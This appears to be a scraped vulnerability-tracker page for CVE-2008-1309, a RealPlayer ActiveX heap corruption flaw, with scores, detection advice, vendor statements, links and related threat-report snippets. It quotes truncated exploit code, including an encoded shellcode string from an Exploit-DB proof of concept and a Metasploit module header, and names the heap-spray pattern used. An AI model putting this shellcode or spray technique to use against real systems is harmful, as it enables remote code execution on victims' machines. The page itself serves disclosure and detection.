CVE-2008-1309
published 2008-03-12CVE-2008-1309: The RealAudioObjects.RealAudio ActiveX control in rmoc3260.dll in RealNetworks RealPlayer Enterprise, RealPlayer 10, RealPlayer 10.5 before build 6.0.12.1675…
PriorityP258critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
45.95%
98.7th percentile
The RealAudioObjects.RealAudio ActiveX control in rmoc3260.dll in RealNetworks RealPlayer Enterprise, RealPlayer 10, RealPlayer 10.5 before build 6.0.12.1675, and RealPlayer 11 before 11.0.3 build 6.0.14.806 does not properly manage memory for the (1) Console or (2) Controls property, which allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via a series of assignments of long string values, which triggers an overwrite of freed heap memory.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realnetworks | realplayer | — | — |
| realnetworks | realplayer | — | — |
| realnetworks | realplayer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%u0C0C%u0C0C (heap spray NOP sled pattern)
- →Detect ActiveX instantiation of the RealAudioObjects.RealAudio control (rmoc3260.dll) in a browser context, particularly when the Console or Controls property is set to a long string value repeatedly. ↗
- →Look for heap spray patterns using the 0x0C0C0C0C address in browser memory or JavaScript unescape sequences containing %u0C0C%u0C0C, which is the NOP sled used in known exploits for this CVE. ↗
- →Monitor for repeated property assignments of long strings to the Console or Controls properties of the RealAudioObjects.RealAudio ActiveX control, which triggers the use-after-free heap overwrite. ↗
- →Flag browser crashes or abnormal termination when rmoc3260.dll is loaded, as denial-of-service via heap corruption is a known outcome of exploitation attempts. ↗
- ·Vulnerable versions are RealPlayer 10.5 before build 6.0.12.1675 and RealPlayer 11 before build 6.0.14.806; detections should be scoped to these version ranges to reduce false positives. ↗
- ·Red Hat Enterprise Linux 3 Extras, 4 Extras, and 5 Supplementary are confirmed not affected; exclude these platforms from detection scope. ↗
- ·The Metasploit module targets Windows XP SP0-SP3 with IE 6.0 SP0-2 and IE 7.0 English specifically; the heap spray offset and return address (0x0C0C0C0C) are target-specific and may differ for other configurations. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-g64h-446x-5j6x: The RealAudioObjects
ghsa_unreviewed·2022-05-01
CVE-2008-1309 [HIGH] GHSA-g64h-446x-5j6x: The RealAudioObjects
The RealAudioObjects.RealAudio ActiveX control in rmoc3260.dll in RealNetworks RealPlayer Enterprise, RealPlayer 10, RealPlayer 10.5 before build 6.0.12.1675, and RealPlayer 11 before 11.0.3 build 6.0.14.806 does not properly manage memory for the (1) Console or (2) Controls property, which allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via a series of assignments of long string values, which triggers an overwrite of freed heap memory.
Red Hat
CVE-2008-1309: The RealAudioObjects
vendor_redhat·CVSS 9.3
CVE-2008-1309 [CRITICAL] CVE-2008-1309: The RealAudioObjects
The RealAudioObjects.RealAudio ActiveX control in rmoc3260.dll in RealNetworks RealPlayer Enterprise, RealPlayer 10, RealPlayer 10.5 before build 6.0.12.1675, and RealPlayer 11 before 11.0.3 build 6.0.14.806 does not properly manage memory for the (1) Console or (2) Controls property, which allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via a series of assignments of long string values, which triggers an overwrite of freed heap memory.
Statement: Not vulnerable. This issue did not affect versions of RealPlayer as shipped with Red Hat Enterprise Linux 3 Extras, 4 Extras, or 5 Supplementary.
No detection rules found.
Exploit-DB
RealPlayer - 'rmoc3260.dll' ActiveX Control Heap Corruption (Metasploit)
exploitdb·2010-06-15
CVE-2008-1309 RealPlayer - 'rmoc3260.dll' ActiveX Control Heap Corruption (Metasploit)
RealPlayer - 'rmoc3260.dll' ActiveX Control Heap Corruption (Metasploit)
---
##
# $Id: realplayer_console.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'RealPlayer rmoc3260.dll ActiveX Control Heap Corruption',
'Description' => %q{
This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control.
By sending a specially crafted string to the 'Console' property
in the rmoc3260.dll control, an attacker may be able to execute
arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ '
Exploit-DB
Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution
exploitdb·2008-04-01
CVE-2008-1309 Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution
Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution
---
Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit
function Check() {
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
"%u4842%u7a6b%u7754%u
Metasploit
RealPlayer rmoc3260.dll ActiveX Control Heap Corruption
metasploit
RealPlayer rmoc3260.dll ActiveX Control Heap Corruption
RealPlayer rmoc3260.dll ActiveX Control Heap Corruption
This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control. By sending a specially crafted string to the 'Console' property in the rmoc3260.dll control, an attacker may be able to execute arbitrary code.
Unit42
Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
blogs_unit42·2019-05-30·CVSS 8.8
[HIGH] Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system. In examining the data it collects, which are URLs extracted from emails or submitted by API, we can identify patterns and trends which help us discern prevalent web threats. This blog is the fourth (4th quarter of 2018) installment in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, CVEs, and now, phishing scams.
The key findings in this quarter’s report in summary are:
1. After Q4 saw an increase in malicious URLs, ending a trend of decreasing malicious URLs starting in Q1 and continuing through Q3.
2. For the first time in our tracking, the United States is not the number one
Unit42
Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
blogs_unit42·2019-05-30·CVSS 8.8
CVE-2018-8174 [HIGH] Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
Threat Research Center
Trend Reports
Malware
## Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Published: May 30, 2019
Malware
Trend Reports
Vulnerabilities
Azorult
CVE-2018-8174
ELink
Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system . In examining the data it collects, which are URLs extracted from emails or submitted by API, we can identify patterns and trends which help us discern prevalent web threats. This blog is the fourth (4th quarter of 2018) installment in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, CVEs, and now, ph
Unit42
Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
blogs_unit42·2018-12-27·CVSS 9.8
[CRITICAL] Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
# Executive Summary
Our Email Link Analysis (ELINK) system is routinely reviewed by our Unit 42 research team. In examining the data it collects, patterns and trends are discovered which helps us discern prevalent web threats. This blog is the third (3rd quarter of 2018) in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, and CVEs.
During Quarter 3 (Q3), July – September, a notable shift occurred with the malicious URL and domain data; there was a significant drop in the number of malicious URLs as well as a drop in malicious domains that will be discussed below. In addition, we will be covering an interesting malicious Flash SWF that exploits CVE-2015-5119.
# URLs
Based on our analysis of dat
Unit42
Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
blogs_unit42·2018-12-27·CVSS 9.8
CVE-2015-5119 [CRITICAL] Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
Threat Research Center
Trend Reports
Malware
## Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Xingyu Jin
Published: December 27, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2015-5119
ELink
## Executive Summary
Our Email Link Analysis (ELINK) system is routinely reviewed by our Unit 42 research team. In examining the data it collects, patterns and trends are discovered which helps us discern prevalent web threats. This blog is the third (3rd quarter of 2018) in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, and CVEs.
During Quarter 3 (Q3), July – September, a notable shift occurred with the malicious URL and domain d
http://lists.grok.org.uk/pipermail/full-disclosure/2008-March/060659.htmlhttp://secunia.com/advisories/29315http://service.real.com/realplayer/security/07252008_player/en/http://www.kb.cert.org/vuls/id/831457http://www.securityfocus.com/archive/1/494779/100/0/threadedhttp://www.securityfocus.com/bid/28157http://www.securitytracker.com/id?1019576http://www.securitytracker.com/id?1020563http://www.vupen.com/english/advisories/2008/0842http://www.vupen.com/english/advisories/2008/2194/referenceshttp://www.zerodayinitiative.com/advisories/ZDI-08-047/https://exchange.xforce.ibmcloud.com/vulnerabilities/41087https://www.exploit-db.com/exploits/5332http://lists.grok.org.uk/pipermail/full-disclosure/2008-March/060659.htmlhttp://secunia.com/advisories/29315http://service.real.com/realplayer/security/07252008_player/en/http://www.kb.cert.org/vuls/id/831457http://www.securityfocus.com/archive/1/494779/100/0/threadedhttp://www.securityfocus.com/bid/28157http://www.securitytracker.com/id?1019576http://www.securitytracker.com/id?1020563http://www.vupen.com/english/advisories/2008/0842http://www.vupen.com/english/advisories/2008/2194/referenceshttp://www.zerodayinitiative.com/advisories/ZDI-08-047/https://exchange.xforce.ibmcloud.com/vulnerabilities/41087https://www.exploit-db.com/exploits/5332
2008-03-12
Published